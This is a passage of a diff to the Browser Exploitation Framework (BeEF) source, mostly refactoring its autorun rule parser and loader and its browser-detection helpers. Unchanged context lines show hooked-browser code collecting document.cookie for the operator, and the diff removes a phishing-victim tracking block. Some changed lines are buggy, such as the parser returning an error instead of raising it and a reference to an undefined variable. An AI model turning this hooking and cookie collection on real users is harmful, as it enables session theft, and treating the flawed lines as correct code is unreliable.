-            print_more "OS version check -> (hook) #{os_version} #{rule.os_version} (rule): #{os_major_version_match && os_minor_version_match}"
-
-            if browser_match && os_match
-              print_more "Hooked browser and OS type/version MATCH rule: #{rule.name}."
-              match_rules.push(rule.id)
-            end
-          rescue StandardError => e
-            print_error e.message
-            print_debug e.backtrace.join("\n")
-          end
-          print_more "Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser type/version."
-
-          match_rules
-        end
-
         # compare versions
         def compare_versions(ver_a, cond, ver_b)
           return true if cond == 'ALL'

core/main/autorun_engine/parser.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -18,68 +18,63 @@ module BeEF
         VERSION = ['<', '<=', '==', '>=', '>', 'ALL', 'Vista', 'XP']
         CHAIN_MODE = %w[sequential nested-forward]
         MAX_VER_LEN = 15
-        # Parse a JSON ARE file and returns an Hash with the value mappings
-        def parse(name, author, browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode)
-          success = [true]
 
-          return [false, 'Illegal chain_mode definition'] unless CHAIN_MODE.include?(chain_mode)
-          return [false, 'Illegal rule name'] unless BeEF::Filters.is_non_empty_string?(name)
-          return [false, 'Illegal author name'] unless BeEF::Filters.is_non_empty_string?(author)
+        def parse(name, author, browser, browser_version, os, os_version, modules, execution_order, execution_delay, chain_mode)
+          raise ArgumentError, "Invalid rule name: #{name}" unless BeEF::Filters.is_non_empty_string?(name)
+          raise ArgumentError, "Invalid author name: #{author}" unless BeEF::Filters.is_non_empty_string?(author)
+          raise ArgumentError, "Invalid chain_mode definition: #{chain_mode}" unless CHAIN_MODE.include?(chain_mode)
+          raise ArgumentError, "Invalid os definition: #{os}" unless OS.include?(os)
+
+          unless modules.size == execution_delay.size
+            raise ArgumentError, "Number of execution_delay values (#{execution_delay.size}) must be consistent with number of modules (#{modules.size})"
+          end
+          execution_delay.each { |delay| raise TypeError, "Invalid execution_delay value: #{delay}. Values must be Integers." unless delay.is_a?(Integer) }
+
+          unless modules.size == execution_order.size
+            raise ArgumentError, "Number of execution_order values (#{execution_order.size}) must be consistent with number of modules (#{modules.size})"
+          end
+          execution_order.each { |order| raise TypeError, "Invalid execution_order value: #{order}. Values must be Integers." unless order.is_a?(Integer) }
 
           # if multiple browsers were specified, check each browser
           if browser.is_a?(Array)
             browser.each do |b|
-              return [false, 'Illegal browser definition'] unless BROWSER.include?(b)
+              raise ArgumentError, "Invalid browser definition: #{browser}" unless BROWSER.include?(b)
             end
           # else, if only one browser was specified, check browser and browser version
           else
-            return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)
+            raise ArgumentError, "Invalid browser definition: #{browser}" unless BROWSER.include?(browser)
 
             if browser_version != 'ALL' && !(VERSION.include?(browser_version[0, 2].gsub(/\s+/, '')) &&
                   BeEF::Filters.is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/, '')) && browser_version.length < MAX_VER_LEN)
-              return [false, 'Illegal browser_version definition']
+              raise ArgumentError, "Invalid browser_version definition: #{browser_version}"
             end
           end
 
           if os_version != 'ALL' && !(VERSION.include?(os_version[0, 2].gsub(/\s+/, '')) &&
                   BeEF::Filters.is_valid_osversion?(os_version[2..-1].gsub(/\s+/, '')) && os_version.length < MAX_VER_LEN)
-            return [false, 'Illegal os_version definition']
+            return ArgumentError, "Invalid os_version definition: #{os_version}"
           end
 
-          return [false, 'Illegal os definition'] unless OS.include?(os)
-
           # check if module names, conditions and options are ok
           modules.each do |cmd_mod|
             mod = BeEF::Core::Models::CommandModule.where(name: cmd_mod['name']).first
-            if mod.nil?
-              return [false, "The specified module name (#{cmd_mod['name']}) does not exist"]
-            else
-              modk = BeEF::Module.get_key_by_database_id(mod.id)
-              mod_options = BeEF::Module.get_options(modk)
 
-              opt_count = 0
-              mod_options.each do |opt|
-                if opt['name'] == cmd_mod['options'].keys[opt_count]
-                  opt_count += 1
-                else
-                  return [false, "The specified option (#{cmd_mod['options'].keys[opt_count]
-                                                        }) for module (#{cmd_mod['name']}) does not exist"]
-                end
+            raise "The specified module name (#{cmd_mod['name']}) does not exist" if mod.nil?
+
+            modk = BeEF::Module.get_key_by_database_id(mod.id)
+            mod_options = BeEF::Module.get_options(modk)
+
+            opt_count = 0
+            mod_options.each do |opt|
+              if opt['name'] != cmd_mod['options'].keys[opt_count]
+                raise ArgumentError, "The specified option (#{cmd_mod['options'].keys[opt_count]}) for module (#{cmd_mod['name']}) was not specified"
               end
+
+              opt_count += 1
             end
           end
 
-          exec_order.each { |order| return [false, 'execution_order values must be Integers'] unless order.integer? }
-          exec_delay.each { |delay| return [false, 'execution_delay values must be Integers'] unless delay.integer? }
-
-          return [false, 'execution_order and execution_delay values must be consistent with modules numbers'] unless
-              modules.size == exec_order.size && modules.size == exec_delay.size
-
-          success
-        rescue StandardError => e
-          print_error e.message.to_s
-          print_debug e.backtrace.join("\n").to_s
-          [false, 'Something went wrong.']
+          true
         end
       end
     end

core/main/autorun_engine/rule_loader.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -14,76 +14,204 @@ module BeEF
           @debug_on = @config.get('beef.debug')
         end
 
-        # this expects parsed JSON as input
-        def load(data)
-          name = data['name']
-          author = data['author']
+        # Load an ARE rule set
+        # @param [Hash] ARE ruleset as JSON
+        # @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String}
+        def load_rule_json(data)
+          name = data['name'] || ''
+          author = data['author'] || ''
           browser = data['browser'] || 'ALL'
           browser_version = data['browser_version'] || 'ALL'
           os = data['os'] || 'ALL'
           os_version = data['os_version'] || 'ALL'
           modules = data['modules']
-          exec_order = data['execution_order']
-          exec_delay = data['execution_delay']
-          chain_mode = data['chain_mode']
+          execution_order = data['execution_order']
+          execution_delay = data['execution_delay']
+          chain_mode = data['chain_mode'] || 'sequential'
 
-          parser_result = BeEF::Core::AutorunEngine::Parser.instance.parse(
-            name, author, browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode
+          begin
+            BeEF::Core::AutorunEngine::Parser.instance.parse(
+              name,
+              author,
+              browser,
+              browser_version,
+              os,
+              os_version,
+              modules,
+              execution_order,
+              execution_delay,
+              chain_mode
+            )
+          rescue => e
+            print_error("[ARE] Error loading ruleset (#{name}): #{e.message}")
+            return { 'success' => false, 'error' => e.message }
+          end
+
+          existing_rule = BeEF::Core::Models::Rule.where(
+            name: name,
+            author: author,
+            browser: browser,
+            browser_version: browser_version,
+            os: os,
+            os_version: os_version,
+            modules: modules.to_json,
+            execution_order: execution_order.to_s,
+            execution_delay: execution_delay.to_s,
+            chain_mode: chain_mode
+          ).first
+
+          unless existing_rule.nil?
+            msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})"
+            print_info("[ARE] Skipping ruleset (#{name}): #{msg}")
+            return { 'success' => false, 'error' => msg }
+          end
+
+          are_rule = BeEF::Core::Models::Rule.new(
+            name: name,
+            author: author,
+            browser: browser,
+            browser_version: browser_version,
+            os: os,
+            os_version: os_version,
+            modules: modules.to_json,
+            execution_order: execution_order.to_s,
+            execution_delay: execution_delay.to_s,
+            chain_mode: chain_mode
+          )
+          are_rule.save
+
+          print_info("[ARE] Ruleset (#{name}) parsed and stored successfully.")
+
+          if @debug_on
+            print_more "Target Browser: #{browser} (#{browser_version})"
+            print_more "Target OS: #{os} (#{os_version})"
+            print_more 'Modules to run:'
+            modules.each do |mod|
+              print_more "(*) Name: #{mod['name']}"
+              print_more "(*) Condition: #{mod['condition']}"
+              print_more "(*) Code: #{mod['code']}"
+              print_more '(*) Options:'
+              mod['options'].each do |key, value|
+                print_more "\t#{key}: (#{value})"
+              end
+            end
+            print_more "Exec order: #{execution_order}"
+            print_more "Exec delay: #{exec_delay}"
+          end
+
+          { 'success' => true, 'rule_id' => are_rule.id }
+        rescue TypeError, ArgumentError => e
+          print_error("[ARE] Failed to load ruleset (#{name}): #{e.message}")
+          { 'success' => false, 'error' => e.message }
+        end
+
+        # Update an ARE rule set.
+        # @param [Hash] ARE rule ID.
+        # @param [Hash] ARE ruleset as JSON
+        # @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String}
+        def update_rule_json(id, data)
+          # Quite similar in implementation to load_rule_json. Might benefit from a refactor.
+          name = data['name'] || ''
+          author = data['author'] || ''
+          browser = data['browser'] || 'ALL'
+          browser_version = data['browser_version'] || 'ALL'
+          os = data['os'] || 'ALL'
+          os_version = data['os_version'] || 'ALL'
+          modules = data['modules']
+          execution_order = data['execution_order']
+          execution_delay = data['execution_delay']
+          chain_mode = data['chain_mode'] || 'sequential'
+
+          begin
+            BeEF::Core::AutorunEngine::Parser.instance.parse(
+              name,
+              author,
+              browser,
+              browser_version,
+              os,
+              os_version,
+              modules,
+              execution_order,
+              execution_delay,
+              chain_mode
+            )
+          rescue => e
+            print_error("[ARE] Error updating ruleset (#{name}): #{e.message}")
+            return { 'success' => false, 'error' => e.message }
+          end
+
+          existing_rule = BeEF::Core::Models::Rule.where(
+            name: name,
+            author: author,
+            browser: browser,
+            browser_version: browser_version,
+            os: os,
+            os_version: os_version,
+            modules: modules.to_json,
+            execution_order: execution_order.to_s,
+            execution_delay: execution_delay.to_s,
+            chain_mode: chain_mode
+          ).first
+
+          unless existing_rule.nil?
+            msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})"
+            print_info("[ARE] Skipping ruleset (#{name}): #{msg}")
+            return { 'success' => false, 'error' => msg }
+          end
+          old_are_rule = BeEF::Core::Models::Rule.find_by(id: id)
+
+          old_are_rule.update(
+            name: name,
+            author: author,
+            browser: browser,
+            browser_version: browser_version,
+            os: os,
+            os_version: os_version,
+            modules: modules.to_json,
+            execution_order: execution_order.to_s,
+            execution_delay: execution_delay.to_s,
+            chain_mode: chain_mode
           )
 
-          if parser_result.length == 1 && parser_result.first
-            print_info "[ARE] Ruleset (#{name}) parsed and stored successfully."
-            if @debug_on
-              print_more "Target Browser: #{browser} (#{browser_version})"
-              print_more "Target OS: #{os} (#{os_version})"
-              print_more 'Modules to Trigger:'
-              modules.each do |mod|
-                print_more "(*) Name: #{mod['name']}"
-                print_more "(*) Condition: #{mod['condition']}"
-                print_more "(*) Code: #{mod['code']}"
-                print_more '(*) Options:'
-                mod['options'].each do |key, value|
-                  print_more "\t#{key}: (#{value})"
-                end
+          print_info("[ARE] Ruleset (#{name}) updated successfully.")
+
+          if @debug_on
+            print_more "Target Browser: #{browser} (#{browser_version})"
+            print_more "Target OS: #{os} (#{os_version})"
+            print_more 'Modules to run:'
+            modules.each do |mod|
+              print_more "(*) Name: #{mod['name']}"
+              print_more "(*) Condition: #{mod['condition']}"
+              print_more "(*) Code: #{mod['code']}"
+              print_more '(*) Options:'
+              mod['options'].each do |key, value|
+                print_more "\t#{key}: (#{value})"
               end
-              print_more "Exec order: #{exec_order}"
-              print_more "Exec delay: #{exec_delay}"
             end
-            are_rule = BeEF::Core::Models::Rule.new(
-              name: name,
-              author: author,
-              browser: browser,
-              browser_version: browser_version,
-              os: os,
-              os_version: os_version,
-              modules: modules.to_json,
-              execution_order: exec_order,
-              execution_delay: exec_delay,
-              chain_mode: chain_mode
-            )
-            are_rule.save
-            { 'success' => true, 'rule_id' => are_rule.id }
-          else
-            print_error "[ARE] Ruleset (#{name}): ERROR. " + parser_result.last
-            { 'success' => false, 'error' => parser_result.last }
+            print_more "Exec order: #{execution_order}"
+            print_more "Exec delay: #{exec_delay}"
           end
-        rescue StandardError => e
-          err = 'Malformed JSON ruleset.'
-          print_error "[ARE] Ruleset (#{name}): ERROR. #{e} #{e.backtrace}"
-          { 'success' => false, 'error' => err }
+
+          { 'success' => true }
+        rescue TypeError, ArgumentError => e
+          print_error("[ARE] Failed to update ruleset (#{name}): #{e.message}")
+          { 'success' => false, 'error' => e.message }
         end
 
-        def load_file(json_rule_path)
+        # Load an ARE ruleset from file
+        # @param [String] JSON ARE ruleset file path
+        def load_rule_file(json_rule_path)
           rule_file = File.open(json_rule_path, 'r:UTF-8', &:read)
-          self.load JSON.parse(rule_file)
-        rescue StandardError => e
-          print_error "[ARE] Failed to load ruleset from #{json_rule_path}: #{e.message}"
+          self.load_rule_json(JSON.parse(rule_file))
+        rescue => e
+          print_error("[ARE] Failed to load ruleset from #{json_rule_path}: #{e.message}")
         end
 
+        # Load all JSON ARE rule files from arerules/enabled/ directory
         def load_directory
-          Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule|
-            print_debug "[ARE] Processing rule: #{rule}"
-            load_file rule
+          Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule_file|
+            print_debug("[ARE] Processing ruleset file: #{rule_file}")
+            load_rule_file(rule_file)
           end
         end
       end

core/main/client/are.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/beef.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/browser.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -944,14 +944,25 @@ beef.browser = {
      */
     isFF99: function () {
         return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/99./) != null;
+    }, 
+
+    /**
+     * Returns true if the browser is any version of Firefox.
+     * @example: beef.browser.isFFbowser()
+    */
+    isFFbowser: function () {
+        const parser = bowser.getParser(navigator.userAgent);
+        const browserName = parser.getBrowserName();
+        return browserName == 'Firefox';
     },
 
     /**
-     * Returns true if FF.
+     * Returns true if the browser is any version of Firefox.
      * @example: beef.browser.isFF()
      */
     isFF: function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
+        var legacyCheck = this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
+        return legacyCheck || this.isFFbowser();
     },
 
     /**
@@ -2438,12 +2449,23 @@ beef.browser = {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 99) ? true : false);
     },
 
+    /**
+     * Returns true for modern versions of Chrome (above 9).
+     * @example: beef.browser.isCbowser()
+     */
+    isCbowser: function () {
+        const parser = bowser.getParser(navigator.userAgent);
+        const browserName = parser.getBrowserName();
+        return browserName == 'Chrome';
+    },    
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC: function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
+        var legacyCheck = this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
+        return legacyCheck || this.isCbowser();
     },
 
     /**
@@ -2486,12 +2508,23 @@ beef.browser = {
         return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
     },
 
+    /**
+     * Returns true if the browser is any version of Opera.
+     * @example: beef.browser.isObowser()
+    */
+    isObowser: function () {
+        const parser = bowser.getParser(navigator.userAgent);
+        const browserName = parser.getBrowserName();
+        return browserName == 'Opera';
+    },
+
     /**
      * Returns true if Opera.
      * @example: beef.browser.isO()
      */
     isO: function () {
-        return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
+        var legacyCheck = this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
+        return legacyCheck || this.isObowser();
     },
 
     /**
@@ -4265,9 +4298,6 @@ beef.browser = {
 
         try {
             var cookies = document.cookie;
-            /* Never stop the madness dear C.
-             * var veglol = beef.browser.cookie.veganLol();
-             */
             if (cookies) details['browser.window.cookies'] = cookies;
         } catch (e) {
             beef.debug("Cookies can't be read. The hooked origin is most probably using HttpOnly.");
@@ -4331,24 +4361,6 @@ beef.browser = {
         if (has_wmp) details['browser.capabilities.wmp'] = has_wmp;
         if (has_vlc) details['browser.capabilities.vlc'] = has_vlc;
 
-        var pf_integration = "<%= @phishing_frenzy_enable %>";
-        if (pf_integration) {
-            var pf_param = "uid";
-            var pf_victim_uid = "";
-            var location_search = window.location.search.substring(1);
-            var params = location_search.split('&');
-            for (var i = 0; i < params.length; i++) {
-                var param_entry = params[i].split('=');
-                if (param_entry[0] == pf_param) {
-                    pf_victim_uid = param_entry[1];
-                    details['PhishingFrenzyUID'] = pf_victim_uid;
-                    break;
-                }
-            }
-        } else {
-            details['PhishingFrenzyUID'] = "N/A";
-        }
-
         return details;
     },
 

core/main/client/browser/cookie.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -72,7 +72,7 @@ beef.browser.cookie = {
 		},
 
 	    /** @memberof beef.browser.cookie */
-		veganLol: function (){
+		cookieValueRandomizer: function (){
 			var to_hell= '';
 			var min = 17;
 			var max = 25;
@@ -100,7 +100,7 @@ beef.browser.cookie = {
 		},
 		/** @memberof beef.browser.cookie */
 		hasSessionCookies: function (name){
-			this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
+			this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), '', '/', '', '' );
 
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');
@@ -109,7 +109,7 @@ beef.browser.cookie = {
 		},
 		/** @memberof beef.browser.cookie */
 		hasPersistentCookies: function (name){
-			this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
+			this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), 1, '/', '', '' );
 
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');

core/main/client/browser/popup.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/dom.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/encode/base64.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/encode/json.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/geolocation.js

